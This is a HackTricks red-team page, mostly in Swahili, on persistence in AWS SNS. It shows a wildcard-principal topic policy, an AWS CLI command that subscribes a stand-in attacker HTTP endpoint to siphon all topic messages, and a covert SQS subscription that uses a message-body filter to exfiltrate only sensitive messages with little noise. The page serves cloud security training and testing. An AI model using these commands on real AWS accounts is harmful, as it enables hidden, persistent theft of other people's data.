AWS - SNS Uendelevu

Reading time: 4 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

SNS

Kwa maelezo zaidi angalia:

AWS - SNS Enum

Uendelevu

Wakati wa kuunda SNS topic unahitaji kutaja kwa sera ya IAM nani ana haki ya kusoma na kuandika. Inawezekana kutaja akaunti za nje, ARN of roles, au hata "*".\

Sera ifuatayo inawapa kila mtu ndani ya AWS upatikanaji wa kusoma na kuandika kwenye SNS topic inayoitwa MySNS.fifo:

json
{
"Version": "2008-10-17",
"Id": "__default_policy_ID",
"Statement": [
{
"Sid": "__default_statement_ID",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"SNS:Publish",
"SNS:RemovePermission",
"SNS:SetTopicAttributes",
"SNS:DeleteTopic",
"SNS:ListSubscriptionsByTopic",
"SNS:GetTopicAttributes",
"SNS:AddPermission",
"SNS:Subscribe"
],
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo",
"Condition": {
"StringEquals": {
"AWS:SourceOwner": "318142138553"
}
}
},
{
"Sid": "__console_pub_0",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Publish",
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
},
{
"Sid": "__console_sub_0",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Subscribe",
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
}
]
}

Unda Subscribers

Ili kuendelea exfiltrating ujumbe wote kutoka kwa topics zote, attacker anaweza create subscribers for all the topics.

Kumbuka kwamba ikiwa topic ni ya aina FIFO, subscribers wanayotumia protocol SQS tu wanaweza kutumika.

bash
aws sns subscribe --region <region> \
--protocol http \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>

Uondoaji wa siri, wa kuchagua kupitia FilterPolicy kwenye MessageBody

Mshambulizi aliye na sns:Subscribe na sns:SetSubscriptionAttributes kwenye topic anaweza kuunda subscription ya SQS ya kujiweka kwa siri ambayo inatuma mbele ujumbe tu ambao body yake ya JSON inalingana na filter nyembamba sana (kwa mfano, {"secret":"true"}). Hii inapunguza wingi na uwezekano wa kugunduliwa huku bado ikiruhusu uondoaji wa siri wa rekodi nyeti.

Potential Impact: Uondoaji wa siri, wa kelele ndogo wa ujumbe za SNS zilizolengwa tu kutoka kwenye topic ya mhanga.

Hatua (AWS CLI):

  • Hakikisha policy ya queue ya mshambuliaji ya SQS inaruhusu sqs:SendMessage kutoka kwa TopicArn ya mhanga (Condition aws:SourceArn ni sawa na TopicArn).
  • Unda subscription ya SQS kwenye topic:
bash
aws sns subscribe --region us-east-1 --topic-arn TOPIC_ARN --protocol sqs --notification-endpoint ATTACKER_Q_ARN
  • Weka filter ifanye kazi kwenye message body na ulingane tu secret=true:
bash
aws sns set-subscription-attributes --region us-east-1 --subscription-arn SUB_ARN --attribute-name FilterPolicyScope --attribute-value MessageBody
aws sns set-subscription-attributes --region us-east-1 --subscription-arn SUB_ARN --attribute-name FilterPolicy --attribute-value '{"secret":["true"]}'
  • Hiari ya kificho: washa RawMessageDelivery ili tu payload ghafi ifikie mpokeaji:
bash
aws sns set-subscription-attributes --region us-east-1 --subscription-arn SUB_ARN --attribute-name RawMessageDelivery --attribute-value true
  • Uthibitisho: chapisha ujumbe mbili na thibitisha kuwa ni wa kwanza tu zile zinazofika kwenye queue ya mshambuliaji. Mfano wa payloads:
json
{"secret":"true","data":"exfil"}
{"secret":"false","data":"benign"}
  • Usafishaji: unsubscribe na delete the attacker SQS queue if created for persistence testing.

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks